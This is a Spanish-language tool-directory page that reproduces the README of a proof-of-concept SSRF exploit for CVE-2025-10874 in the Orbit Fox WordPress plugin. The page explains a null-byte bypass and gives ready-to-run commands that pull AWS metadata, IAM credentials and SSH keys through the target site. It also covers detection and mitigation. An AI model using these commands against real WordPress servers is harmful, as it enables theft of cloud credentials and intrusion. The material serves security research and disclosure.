Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Orbit-Fox_SSRF_CVE-2025-10874 — Demuestra SSRF con inyección de byte nulo para evadir CVE-2025-10874 | Kitploit
Herramientas/GitHubGitHub/ryanmroth/orbit-fox_ssrf_cve-2025-10874
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubryanmroth/orbit-fox_ssrf_cve-2025-10874

Orbit-Fox_SSRF_CVE-2025-10874

Demuestra SSRF con inyección de byte nulo para evadir CVE-2025-10874

Ver Repositorio
hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

alt text

CVE-2025-10874 - Prueba de Concepto SSRF en Orbit Fox

Exploit de prueba de concepto que demuestra la vulnerabilidad de Server-Side Request Forgery (SSRF) en el plugin Orbit Fox de WordPress con bypass de inyección de byte nulo.

Artículo detallado: https://ryanmroth.com/articles/orbit-fox-ssrf

Detalles de la Vulnerabilidad

DetalleNotas
ID CVE:CVE-2025-10874
Plugin Afectado:Orbit Fox de ThemeIsle
Tipo de Vulnerabilidad:Server-Side Request Forgery (SSRF) (CWE-918)
Puntuación CVSS:5.5 (media)
Privilegios Requeridos:Autor+ (rol de Autor de WordPress o superior)
Versión Corregida3.0.2+

Descripción

La funcionalidad de importación MyStock del plugin Orbit Fox contiene una vulnerabilidad SSRF que permite a usuarios autenticados con privilegios de Autor+ realizar solicitudes HTTP arbitrarias desde el servidor WordPress. La vulnerabilidad existe en la acción AJAX handle-request-mystock-import, que no valida ni sanitiza adecuadamente los parámetros de URL.

El exploit aprovecha un bypass de inyección de byte nulo (%00.txt) para eludir la validación de URL, permitiendo el acceso a servicios internos de metadatos, API de proveedores de nube y otros recursos de red accesibles desde el servidor.

Escenarios de Ataque Comunes

Extracción de Metadatos de AWS EC2

  • Nombre de host de la instancia: http://169.254.169.254/latest/meta-data/hostname
  • Credenciales IAM: http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Claves públicas SSH: http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

Instalación

Requisitos

  • Python 3.7+
  • Biblioteca requests
  • Biblioteca urllib3

Configuración

root@kitploit:~
# Clonar el repositorio
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874

# Instalar dependencias (usando uv)
uv sync

# O usando pip
pip install requests urllib3

Uso

Uso Básico

root@kitploit:~
# Extraer nombre de host de instancia AWS (objetivo predeterminado)
python orbit_fox_poc.py http://target.com -u author -p password123

# Especificar URL SSRF personalizada
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/hostname

Ejemplos Avanzados

root@kitploit:~
# Extraer credenciales de rol IAM
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Extraer clave pública SSH
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

# Probar sin bypass de byte nulo (fallará en versiones parcheadas)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte

# Habilitar salida de depuración para solución de problemas
python orbit_fox_poc.py http://target.com -u author -p password123 --debug

Opciones de Línea de Comandos

root@kitploit:~
argumentos posicionales:
  target                URL de WordPress objetivo (ej., http://example.com)

argumentos requeridos:
  -u, --username        Nombre de usuario de WordPress (se requiere rol Autor+)
  -p, --password        Contraseña de WordPress

argumentos opcionales:
  -h, --help            Mostrar mensaje de ayuda y salir
  -s, --ssrf-url        URL a solicitar mediante SSRF
                        (predeterminado: http://169.254.169.254/latest/meta-data/hostname)
  --no-nullbyte         Deshabilitar bypass de byte nulo (probar solo SSRF básico)
  --debug               Habilitar salida de depuración para solución de problemas

Cómo Funciona

  1. Autenticación: Se autentica en WordPress usando las credenciales proporcionadas
  2. Obtención de Nonce: Extrae el nonce de seguridad del panel de administración de WordPress
  3. Inyección de Byte Nulo: Agrega %00.txt a la URL objetivo para eludir la validación
  4. Ejecución SSRF: Envía una solicitud manipulada al endpoint AJAX handle-request-mystock-import
  5. Recuperación de Contenido: Obtiene y muestra el contenido recuperado de la biblioteca de medios de WordPress

Detección

Indicadores de Registro

  • Solicitudes HTTP salientes inusuales a servicios de metadatos (169.254.169.254)
  • Solicitudes a admin-ajax.php con la acción handle-request-mystock-import
  • Cargas en la biblioteca de medios de WordPress desde URLs internas/de metadatos

Mitigación

  • Actualizar Orbit Fox a la versión 3.0.2 o posterior
  • Implementar filtrado estricto de tráfico saliente en el servidor WordPress
  • Monitorear y restringir el acceso a endpoints de metadatos de nube
  • Revisar los roles de usuario y limitar los privilegios de Autor+

Divulgación Responsable

Esta vulnerabilidad fue divulgada responsablemente al proveedor y ha sido parcheada en Orbit Fox versión 3.0.2. Esta prueba de concepto se proporciona para:

  • Investigación y pruebas de seguridad
  • Evaluación de vulnerabilidades en sistemas autorizados
  • Fines educativos

Aviso Legal

SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Los usuarios deben:

  • Obtener permiso explícito por escrito antes de realizar pruebas
  • Usarla solo en sistemas que posean o tengan autorización para probar
  • Cumplir con todas las leyes y regulaciones aplicables

El autor no asume ninguna responsabilidad por el mal uso de esta herramienta.

Referencias

  • Vulnerabilidad Original Alex Sanford – CVE-2023-2287
  • Detalles CVE: CVE-2025-10874
  • Repositorio del Plugin: Orbit Fox de ThemeIsle
  • Servicio de Metadatos AWS: Instance Metadata Service

Última Actualización: 2025-10-06

Descargar herramienta